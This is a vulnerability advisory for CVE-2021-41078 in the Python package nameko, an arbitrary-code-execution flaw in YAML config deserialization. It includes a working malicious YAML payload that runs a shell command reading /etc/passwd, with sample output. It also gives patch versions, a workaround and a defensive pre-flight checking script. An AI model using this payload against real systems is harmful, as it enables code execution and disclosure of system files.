CVE-2021-41078 – nameko
Package
Manager: pip
Name: nameko
Vulnerable Version: >=0 <2.14.0 || >=3.0.0rc0 <3.0.0rc10
Severity
Level: Critical
CVSS v3.1: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
CVSS v4.0: CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H
EPSS: 0.01473 (percentile: 0.80207)
Details
Nameko Arbitrary code execution due to YAML deserialization

### Impact

Nameko can be tricked into performing arbitrary code execution when deserialising a YAML config file. Example:

```yaml
# malicious.yaml
!!python/object/new:type
args: ['z', !!python/tuple [], {'extend': !!python/name:exec }]
listitems: "__import__('os').system('cat /etc/passwd')"
```

```shell
$ nameko run --config malicious.yaml test
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
...
```

### Patches

The problem was fixed in https://github.com/nameko/nameko/pull/722 and released in version 2.14.0, and in rc10 of the v3 pre-release. Versions prior to 2.14.0, and v3.0.0rc0 through v3.0.0rc9 are still vulnerable.

### Workarounds

The vulnerability is exploited by config files with malicious content. It can be avoided by only using config files that you trust.
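A pre-flight check in the spirit of the workaround above, as an added example that is not part of the advisory or of nameko: it tests a version string against the affected ranges listed on this page and scans a config file's text for Python-specific YAML tags before the file is passed to `nameko run --config`. The function names are hypothetical, version strings are assumed to look like `X.Y.Z` or `X.Y.ZrcN`, and the tag scan is a conservative text heuristic rather than a YAML parser.

```python
import re
from urllib.parse import unquote

FINAL = float("inf")  # a final release sorts after its release candidates
_VERSION = re.compile(r"^(\d+)\.(\d+)(?:\.(\d+))?(?:rc(\d+))?$")
# A YAML tag token: "!" at line start or after whitespace / flow punctuation.
_TAG = re.compile(r"(?:^|(?<=[\s\[{,]))!\S*")


def is_affected(version):
    """True if version is in the advisory's ranges:
    >=0 <2.14.0 || >=3.0.0rc0 <3.0.0rc10."""
    m = _VERSION.match(version.strip())
    if not m:
        raise ValueError(f"unrecognised version string: {version!r}")
    major, minor, patch, rc = m.groups()
    key = (int(major), int(minor), int(patch or 0), FINAL if rc is None else int(rc))
    return key < (2, 14, 0, FINAL) or (3, 0, 0, 0) <= key < (3, 0, 0, 10)


def python_tags(config_text):
    """Return (line number, token) for each Python-specific YAML tag.

    %TAG directives are reported because they can alias the python/ prefix,
    and %xx escapes are decoded before matching. Comments and quoted strings
    can produce false positives, which is acceptable for a gate.
    """
    hits = []
    for lineno, line in enumerate(config_text.splitlines(), 1):
        if line.startswith("%TAG"):
            hits.append((lineno, line.strip()))
            continue
        for token in _TAG.findall(line):
            if "python" in unquote(token).lower():
                hits.append((lineno, token))
    return hits


def preflight(version, config_text):
    """Reasons to refuse `nameko run --config`; an empty list means proceed."""
    reasons = []
    if is_affected(version):
        reasons.append(f"nameko {version} is affected; upgrade to 2.14.0 or 3.0.0rc10")
    reasons += [f"line {n}: Python-specific YAML tag {t!r}" for n, t in python_tags(config_text)]
    return reasons


if __name__ == "__main__":
    # Constructed sample: one tag from the advisory's example, with no payload.
    sample = "AMQP_URI: pyamqp://guest:guest@localhost\nhook: !!python/name:exec\n"
    for reason in preflight("2.13.0", sample):
        print(reason)
```

A clean scan does not make an untrusted file safe to load on an affected version; upgrading to a fixed release remains the remedy.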
Metadata
Created: 2021-10-19T15:28:57Z
Modified: 2024-10-07T14:45:04Z
Source: https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/10/GHSA-6p52-jr3q-c94g/GHSA-6p52-jr3q-c94g.json
CWE IDs: ["CWE-502"]
Alternative ID: GHSA-6p52-jr3q-c94g
Finding: F096
Auto approve: 1